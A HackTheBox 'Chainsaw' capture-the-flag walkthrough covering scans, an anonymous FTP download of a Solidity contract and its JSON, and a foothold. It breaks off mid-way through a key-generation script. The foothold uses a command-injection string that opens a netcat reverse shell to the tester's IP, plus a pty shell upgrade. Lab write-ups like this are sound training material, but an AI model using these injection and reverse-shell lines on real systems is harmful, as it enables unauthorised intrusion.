Chainsaw – (HackTheBox)

root@kali:~/Downloads# nmap -A 10.10.10.142
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 10:53 GMT
Nmap scan report for 10.10.10.142
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r–r– 1 1001 1001 23828 Dec 05 2018 WeaponizedPing.json
| -rw-r–r– 1 1001 1001 243 Dec 12 2018 WeaponizedPing.sol
|_-rw-r–r– 1 1001 1001 44 Nov 24 06:02 address.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.15.187
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:dd:8a:5d:3c:78:d4:41:ff:bb:27:39:c1:a2:4f:eb (RSA)
| 256 3d:71:ff:d7:29:d5:d4:b2:a6:4f:9d:eb:91:1b:70:9f (ECDSA)
|_ 256 7e:02:da:db:29:f9:d2:04:63:df:fc:91:fd:a2:5a:f2 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/24%OT=21%CT=1%CU=33778%PV=Y%DS=2%DC=T%G=Y%TM=5DDA61
OS:42%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 215.76 ms 10.10.14.1
2 215.82 ms 10.10.10.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds

root@kali:~/Downloads# ftp 10.10.10.142
Connected to 10.10.10.142.
220 (vsFTPd 3.0.3)
Name (10.10.10.142:root): anonymous
331 Please specify the password.
Password: anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r–r– 1 1001 1001 23828 Dec 05 2018 WeaponizedPing.json
-rw-r–r– 1 1001 1001 243 Dec 12 2018 WeaponizedPing.sol
-rw-r–r– 1 1001 1001 44 Nov 24 06:02 address.txt
226 Directory send OK.
ftp> mget *
mget WeaponizedPing.json? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for WeaponizedPing.json (23828 bytes).
226 Transfer complete.
23828 bytes received in 0.21 secs (109.9201 kB/s)
mget WeaponizedPing.sol? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for WeaponizedPing.sol (243 bytes).
226 Transfer complete.
243 bytes received in 0.00 secs (4.6349 MB/s)
mget address.txt? y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for address.txt (44 bytes).
226 Transfer complete.
44 bytes received in 0.00 secs (452.3026 kB/s)
ftp> exit
221 Goodbye.

root@kali:~/Downloads# cat WeaponizedPing.sol
pragma solidity ^0.4.24;

// WeaponizedPing keeps a single string in contract storage and exposes a
// public getter and a public setter for it.
contract WeaponizedPing
{
// State variable holding the current domain; initialised to google.com.
string store = “google.com”;

// Read-only accessor: returns the current value of store.
function getDomain() public view returns (string)
{
return store;
}

// Overwrites store with the caller-supplied string.
// NOTE(review): the function is public, carries no modifier and performs no
// validation, so any account able to transact with the contract can set an
// arbitrary value. Whatever consumes getDomain() must treat the result as
// untrusted input; restricting the setter to an owner address would narrow
// who can write it.
function setDomain(string _value) public
{
store = _value;
}
}

root@kali:~/Downloads# cat WeaponizedPing.json
{
“contractName”: “WeaponizedPing”,
“abi”: [
{
“constant”: true,
“inputs”: [],
“name”: “getDomain”,
“outputs”: [
{
“name”: “”,
“type”: “string”
}
],
“payable”: false,
“stateMutability”: “view”,
“type”: “function”
},
{
“constant”: false,
“inputs”: [
{
“name”: “_value”,
“type”: “string”
}
],
“name”: “setDomain”,
“outputs”: [],
“payable”: false,
“stateMutability”: “nonpayable”,
“type”: “function”
}
],
“bytecode”: “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”,
“deployedBytecode”: “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”,
“sourceMap”: “27:210:1:-;;;56:27;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;27:210;8:9:-1;5:2;;;30:1;27;20:12;5:2;27:210:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;:::o;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;:::-;;;;;;;”,
“deployedSourceMap”: “27:210:1:-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;88:75;;8:9:-1;5:2;;;30:1;27;20:12;5:2;88:75:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23:1:-1;8:100;33:3;30:1;27:10;8:100;;;99:1;94:3;90:11;84:18;80:1;75:3;71:11;64:39;52:2;49:1;45:10;40:15;;8:100;;;12:14;88:75:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;166:68;;8:9:-1;5:2;;;30:1;27;20:12;5:2;166:68:1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;88:75;130:6;153:5;146:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;88:75;:::o;166:68::-;223:6;215:5;:14;;;;;;;;;;;;:::i;:::-;;166:68;:::o;27:210::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;:::o;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o”,
“source”: “pragma solidity ^0.4.24;\n\n\ncontract WeaponizedPing {\n\n string store = \”google.com\”;\n\n function getDomain() public view returns (string) {\n return store;\n }\n function setDomain(string _value) public {\n store = _value;\n }\n\n}\n\n”,
“sourcePath”: “/opt/WeaponizedPing/WeaponizedPing.sol”,
“ast”: {
“absolutePath”: “/opt/WeaponizedPing/WeaponizedPing.sol”,
“exportedSymbols”: {
“WeaponizedPing”: [
80
]
},
“id”: 81,
“nodeType”: “SourceUnit”,
“nodes”: [
{
“id”: 58,
“literals”: [
“solidity”,
“^”,
“0.4”,
“.24”
],
“nodeType”: “PragmaDirective”,
“src”: “0:24:1”
},
{
“baseContracts”: [],
“contractDependencies”: [],
“contractKind”: “contract”,
“documentation”: null,
“fullyImplemented”: true,
“id”: 80,
“linearizedBaseContracts”: [
80
],
“name”: “WeaponizedPing”,
“nodeType”: “ContractDefinition”,
“nodes”: [
{
“constant”: false,
“id”: 61,
“name”: “store”,
“nodeType”: “VariableDeclaration”,
“scope”: 80,
“src”: “56:27:1”,
“stateVariable”: true,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string”
},
“typeName”: {
“id”: 59,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “56:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: {
“argumentTypes”: null,
“hexValue”: “676f6f676c652e636f6d”,
“id”: 60,
“isConstant”: false,
“isLValue”: false,
“isPure”: true,
“kind”: “string”,
“lValueRequested”: false,
“nodeType”: “Literal”,
“src”: “71:12:1”,
“subdenomination”: null,
“typeDescriptions”: {
“typeIdentifier”: “t_stringliteral_fda446403d30f2bb15bf0f6e6a453eb8c51242c96883275950401463830444fd”,
“typeString”: “literal_string \”google.com\””
},
“value”: “google.com”
},
“visibility”: “internal”
},
{
“body”: {
“id”: 68,
“nodeType”: “Block”,
“src”: “138:25:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 66,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “153:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“functionReturnParameters”: 65,
“id”: 67,
“nodeType”: “Return”,
“src”: “146:12:1”
}
]
},
“documentation”: null,
“id”: 69,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: true,
“modifiers”: [],
“name”: “getDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 62,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “106:2:1”
},
“payable”: false,
“returnParameters”: {
“id”: 65,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 64,
“name”: “”,
“nodeType”: “VariableDeclaration”,
“scope”: 69,
“src”: “130:6:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 63,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “130:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “129:8:1”
},
“scope”: 80,
“src”: “88:75:1”,
“stateMutability”: “view”,
“superFunction”: null,
“visibility”: “public”
},
{
“body”: {
“id”: 78,
“nodeType”: “Block”,
“src”: “207:27:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 76,
“isConstant”: false,
“isLValue”: false,
“isPure”: false,
“lValueRequested”: false,
“leftHandSide”: {
“argumentTypes”: null,
“id”: 74,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “215:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“nodeType”: “Assignment”,
“operator”: “=”,
“rightHandSide”: {
“argumentTypes”: null,
“id”: 75,
“name”: “_value”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 71,
“src”: “223:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string memory”
}
},
“src”: “215:14:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“id”: 77,
“nodeType”: “ExpressionStatement”,
“src”: “215:14:1”
}
]
},
“documentation”: null,
“id”: 79,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: false,
“modifiers”: [],
“name”: “setDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 72,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 71,
“name”: “_value”,
“nodeType”: “VariableDeclaration”,
“scope”: 79,
“src”: “185:13:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 70,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “185:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “184:15:1”
},
“payable”: false,
“returnParameters”: {
“id”: 73,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “207:0:1”
},
“scope”: 80,
“src”: “166:68:1”,
“stateMutability”: “nonpayable”,
“superFunction”: null,
“visibility”: “public”
}
],
“scope”: 81,
“src”: “27:210:1”
}
],
“src”: “0:239:1”
},
“legacyAST”: {
“absolutePath”: “/opt/WeaponizedPing/WeaponizedPing.sol”,
“exportedSymbols”: {
“WeaponizedPing”: [
80
]
},
“id”: 81,
“nodeType”: “SourceUnit”,
“nodes”: [
{
“id”: 58,
“literals”: [
“solidity”,
“^”,
“0.4”,
“.24”
],
“nodeType”: “PragmaDirective”,
“src”: “0:24:1”
},
{
“baseContracts”: [],
“contractDependencies”: [],
“contractKind”: “contract”,
“documentation”: null,
“fullyImplemented”: true,
“id”: 80,
“linearizedBaseContracts”: [
80
],
“name”: “WeaponizedPing”,
“nodeType”: “ContractDefinition”,
“nodes”: [
{
“constant”: false,
“id”: 61,
“name”: “store”,
“nodeType”: “VariableDeclaration”,
“scope”: 80,
“src”: “56:27:1”,
“stateVariable”: true,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string”
},
“typeName”: {
“id”: 59,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “56:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: {
“argumentTypes”: null,
“hexValue”: “676f6f676c652e636f6d”,
“id”: 60,
“isConstant”: false,
“isLValue”: false,
“isPure”: true,
“kind”: “string”,
“lValueRequested”: false,
“nodeType”: “Literal”,
“src”: “71:12:1”,
“subdenomination”: null,
“typeDescriptions”: {
“typeIdentifier”: “t_stringliteral_fda446403d30f2bb15bf0f6e6a453eb8c51242c96883275950401463830444fd”,
“typeString”: “literal_string \”google.com\””
},
“value”: “google.com”
},
“visibility”: “internal”
},
{
“body”: {
“id”: 68,
“nodeType”: “Block”,
“src”: “138:25:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 66,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “153:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“functionReturnParameters”: 65,
“id”: 67,
“nodeType”: “Return”,
“src”: “146:12:1”
}
]
},
“documentation”: null,
“id”: 69,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: true,
“modifiers”: [],
“name”: “getDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 62,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “106:2:1”
},
“payable”: false,
“returnParameters”: {
“id”: 65,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 64,
“name”: “”,
“nodeType”: “VariableDeclaration”,
“scope”: 69,
“src”: “130:6:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 63,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “130:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “129:8:1”
},
“scope”: 80,
“src”: “88:75:1”,
“stateMutability”: “view”,
“superFunction”: null,
“visibility”: “public”
},
{
“body”: {
“id”: 78,
“nodeType”: “Block”,
“src”: “207:27:1”,
“statements”: [
{
“expression”: {
“argumentTypes”: null,
“id”: 76,
“isConstant”: false,
“isLValue”: false,
“isPure”: false,
“lValueRequested”: false,
“leftHandSide”: {
“argumentTypes”: null,
“id”: 74,
“name”: “store”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 61,
“src”: “215:5:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“nodeType”: “Assignment”,
“operator”: “=”,
“rightHandSide”: {
“argumentTypes”: null,
“id”: 75,
“name”: “_value”,
“nodeType”: “Identifier”,
“overloadedDeclarations”: [],
“referencedDeclaration”: 71,
“src”: “223:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string memory”
}
},
“src”: “215:14:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage”,
“typeString”: “string storage ref”
}
},
“id”: 77,
“nodeType”: “ExpressionStatement”,
“src”: “215:14:1”
}
]
},
“documentation”: null,
“id”: 79,
“implemented”: true,
“isConstructor”: false,
“isDeclaredConst”: false,
“modifiers”: [],
“name”: “setDomain”,
“nodeType”: “FunctionDefinition”,
“parameters”: {
“id”: 72,
“nodeType”: “ParameterList”,
“parameters”: [
{
“constant”: false,
“id”: 71,
“name”: “_value”,
“nodeType”: “VariableDeclaration”,
“scope”: 79,
“src”: “185:13:1”,
“stateVariable”: false,
“storageLocation”: “default”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_memory_ptr”,
“typeString”: “string”
},
“typeName”: {
“id”: 70,
“name”: “string”,
“nodeType”: “ElementaryTypeName”,
“src”: “185:6:1”,
“typeDescriptions”: {
“typeIdentifier”: “t_string_storage_ptr”,
“typeString”: “string”
}
},
“value”: null,
“visibility”: “internal”
}
],
“src”: “184:15:1”
},
“payable”: false,
“returnParameters”: {
“id”: 73,
“nodeType”: “ParameterList”,
“parameters”: [],
“src”: “207:0:1”
},
“scope”: 80,
“src”: “166:68:1”,
“stateMutability”: “nonpayable”,
“superFunction”: null,
“visibility”: “public”
}
],
“scope”: 81,
“src”: “27:210:1”
}
],
“src”: “0:239:1”
},
“compiler”: {
“name”: “solc”,
“version”: “0.4.24+commit.e67f0147.Emscripten.clang”
},
“networks”: {
“1543936419890”: {
“events”: {},
“links”: {},
“address”: “0xaf6ce61d342b48cc992820a154fe0f533e5e487c”,
“transactionHash”: “0x5e94c662f1048fca58c07e16506f1636391f757b07c1b6bb6fbb4380769e99e1”
}
},
“schemaVersion”: “2.0.1”,
“updatedAt”: “2018-12-04T15:24:57.205Z”
}

root@kali:~/Downloads# cat address.txt
0xe3BA3Bd84Eb7bBa32E82e2E58e97226b04D86700

WeaponizedPing: Analysis

WeaponizedPing is a smart contract. Smart contracts like this one are written in a language called Solidity.
The contract has a state variable called store, which holds the value google.com by default:

string store = “google.com”;

There are two functions. The first, getDomain(), returns the value of store:

function getDomain() public view returns (string)
{
return store;
}

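The second, setDomain(), takes a string and replaces the value of store with it. It is declared public and has no access check or input validation, so any account that can send a transaction to the contract can change the stored domain: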

function setDomain(string _value) public
{
store = _value;
}

root@kali:~/Downloads# nmap -p- -T5 10.10.10.142 --max-retries 1 -o nmapfull
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 11:11 GMT
Warning: 10.10.10.142 giving up on port because retransmission cap hit (1).
Stats: 0:02:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 38.85% done; ETC: 11:17 (0:03:18 remaining)
Stats: 0:03:31 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.02% done; ETC: 11:17 (0:01:54 remaining)
Stats: 0:04:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.28% done; ETC: 11:17 (0:00:32 remaining)
Nmap scan report for 10.10.10.142
Host is up (0.22s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
9810/tcp open unknown
13286/tcp filtered unknown
17699/tcp filtered unknown
36684/tcp filtered unknown
40389/tcp filtered unknown
42237/tcp filtered unknown
44814/tcp filtered unknown
45070/tcp filtered unknown
64501/tcp filtered unknown
65112/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 357.10 seconds

root@kali:~/Downloads# nmap -p 9810 -sV -sT -sC -o nmap9810 10.10.10.142
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 11:18 GMT
Nmap scan report for 10.10.10.142
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
9810/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 400 Bad Request
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Sun, 24 Nov 2019 11:20:16 GMT
| Connection: close
| Request
| GetRequest:
| HTTP/1.1 400 Bad Request
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Sun, 24 Nov 2019 11:20:08 GMT
| Connection: close
| Request
| HTTPOptions:
| HTTP/1.1 200 OK
| Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, User-Agent
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: *
| Content-Type: text/plain
| Date: Sun, 24 Nov 2019 11:20:10 GMT
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9810-TCP:V=7.80%I=7%D=11/24%Time=5DDA672F%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,118,”HTTP/1\.1\x20400\x20Bad\x20Request\r\nAccess-Control-All
SF:ow-Headers:\x20Origin,\x20X-Requested-With,\x20Content-Type,\x20Accept,
SF:\x20User-Agent\r\nAccess-Control-Allow-Origin:\x20\*\r\nAccess-Control-
SF:Allow-Methods:\x20\*\r\nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2
SF:024\x20Nov\x202019\x2011:20:08\x20GMT\r\nConnection:\x20close\r\n\r\n40
SF:0\x20Bad\x20Request”)%r(HTTPOptions,100,”HTTP/1\.1\x20200\x20OK\r\nAcce
SF:ss-Control-Allow-Headers:\x20Origin,\x20X-Requested-With,\x20Content-Ty
SF:pe,\x20Accept,\x20User-Agent\r\nAccess-Control-Allow-Origin:\x20\*\r\nA
SF:ccess-Control-Allow-Methods:\x20\*\r\nContent-Type:\x20text/plain\r\nDa
SF:te:\x20Sun,\x2024\x20Nov\x202019\x2011:20:10\x20GMT\r\nConnection:\x20c
SF:lose\r\n\r\n”)%r(FourOhFourRequest,118,”HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nAccess-Control-Allow-Headers:\x20Origin,\x20X-Requested-With,\x2
SF:0Content-Type,\x20Accept,\x20User-Agent\r\nAccess-Control-Allow-Origin:
SF:\x20\*\r\nAccess-Control-Allow-Methods:\x20\*\r\nContent-Type:\x20text/
SF:plain\r\nDate:\x20Sun,\x2024\x20Nov\x202019\x2011:20:16\x20GMT\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request”);

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.21 seconds

root@kali:~/Downloads# gedit weapon.py
root@kali:~/Downloads# chmod +x weapon.py
root@kali:~/Downloads# ./weapon.py ‘; nc 10.10.15.187 1234 -e /bin/bash’

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.142.
Ncat: Connection from 10.10.10.142:35952.

id
uid=1001(administrator) gid=1001(administrator) groups=1001(administrator)

python -c ‘import pty;pty.spawn(“/bin/bash”)’
administrator@chainsaw:/opt/WeaponizedPing$

administrator@chainsaw:/opt/WeaponizedPing$ ls -la
ls -la
total 24
drwxr-xr-x 4 administrator administrator 4096 Jan 23 2019 .
drwxr-xr-x 3 root root 4096 Dec 5 2018 ..
-rwxr-xr-x 1 administrator administrator 2106 Jan 22 2019 main.py
drwxr-xr-x 2 administrator administrator 4096 Dec 13 2018 __pycache__
-rwxr-xr-x 1 administrator administrator 379 Dec 13 2018 runganache.py
drwxr-xr-x 2 administrator administrator 4096 Nov 24 06:01 shared
administrator@chainsaw:/opt/WeaponizedPing$ cd /home
cd /home
administrator@chainsaw:/home$ ls -lrt
ls -lrt
total 8
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 administrator
drwxr-x— 9 bobby bobby 4096 Nov 24 06:44 bobby
administrator@chainsaw:/home$ cd maintain/pub
cd maintain/pub
bash: cd: maintain/pub: No such file or directory
administrator@chainsaw:/home$ cd bobby
cd bobby
bash: cd: bobby: Permission denied
administrator@chainsaw:/home$ cd ..
cd ..
administrator@chainsaw:/$ ls -lrt
ls -lrt
total 2097252
drwxr-xr-x 2 root root 4096 Oct 17 2018 mnt
drwxr-xr-x 2 root root 4096 Oct 17 2018 media
drwxr-xr-x 2 root root 4096 Oct 17 2018 lib64
drwxr-xr-x 13 root root 4096 Oct 17 2018 var
drwx—— 2 root root 16384 Nov 30 2018 lost+found
-rw——- 1 root root 2147483648 Nov 30 2018 swap.img
drwxr-xr-x 2 root root 4096 Nov 30 2018 lib32
drwxr-xr-x 12 root root 4096 Nov 30 2018 usr
drwxr-xr-x 2 root root 4096 Nov 30 2018 libx32
drwxr-xr-x 3 root root 4096 Dec 5 2018 opt
drwxr-xr-x 3 root root 4096 Dec 8 2018 srv
drwxr-xr-x 4 root root 4096 Dec 12 2018 home
drwxr-xr-x 6 root root 4096 Dec 12 2018 snap
lrwxrwxrwx 1 root root 30 Dec 20 2018 vmlinuz.old -> boot/vmlinuz-4.18.0-12-generic
lrwxrwxrwx 1 root root 30 Dec 20 2018 vmlinuz -> boot/vmlinuz-4.18.0-13-generic
lrwxrwxrwx 1 root root 33 Dec 20 2018 initrd.img.old -> boot/initrd.img-4.18.0-12-generic
lrwxrwxrwx 1 root root 33 Dec 20 2018 initrd.img -> boot/initrd.img-4.18.0-13-generic
drwxr-xr-x 3 root root 4096 Jan 12 2019 boot
drwxr-xr-x 2 root root 4096 Jan 12 2019 bin
drwxr-xr-x 22 root root 4096 May 30 14:49 lib
drwxr-xr-x 2 root root 12288 May 30 14:49 sbin
drwxr-xr-x 95 root root 4096 May 30 14:49 etc
drwx—— 10 root root 4096 May 30 15:15 root
dr-xr-xr-x 177 root root 0 Nov 24 06:00 proc
dr-xr-xr-x 13 root root 0 Nov 24 06:00 sys
drwxr-xr-x 18 root root 3920 Nov 24 06:01 dev
drwxr-xr-x 27 root root 940 Nov 24 06:39 run
drwxrwxrwt 13 root root 4096 Nov 24 06:47 tmp

administrator@chainsaw:/$ cd /home
cd /home
administrator@chainsaw:/home$ ls -lrt
ls -lrt
total 8
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 administrator
drwxr-x— 9 bobby bobby 4096 Nov 24 06:44 bobby
administrator@chainsaw:/home$ cd administrator
cd administrator
administrator@chainsaw:/home/administrator$ ls -lrt
ls -lrt
total 8
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv

administrator@chainsaw:/home/administrator$ ls -lrt
ls -lrt
total 8
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
administrator@chainsaw:/home/administrator$ cd maintain
cd maintain
administrator@chainsaw:/home/administrator/maintain$ ls -lrt
ls -lrt
total 8
drwxrwxr-x 2 administrator administrator 4096 Dec 13 2018 pub
-rwxr-x— 1 administrator administrator 649 Dec 13 2018 gen.py
administrator@chainsaw:/home/administrator/maintain$ cd pub
cd pub
administrator@chainsaw:/home/administrator/maintain/pub$ ls -lrt
ls -lrt
total 20
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 arti.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 bobby.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 wendy.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 lara.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 bryan.key.pub

administrator@chainsaw:/home/administrator/maintain$ cat gen.py
cat gen.py
#!/usr/bin/python
from Crypto.PublicKey import RSA
from os import chmod
import getpass

# Create a 2048-bit RSA key pair for one user and write both halves to disk:
# the private key to "<username>.key" and the public key to
# "<username>.key.pub", both relative to the current working directory.
#   username - used verbatim as the file-name stem
#   password - passphrase handed to exportKey() to protect the private key
# Returns nothing; the only effects are the two files.
def generate(username,password):
key = RSA.generate(2048)
pubkey = key.publickey()

# Public half in OpenSSH format.
pub = pubkey.exportKey(‘OpenSSH’)
# Private half as passphrase-protected PEM with pkcs=1.
# NOTE(review): PyCrypto documents this combination as the legacy PEM
# encryption scheme (MD5-based key derivation, Triple DES), so the key is
# only as strong as the passphrase against offline guessing - confirm
# against the installed library version.
priv = key.exportKey(‘PEM’,password,pkcs=1)

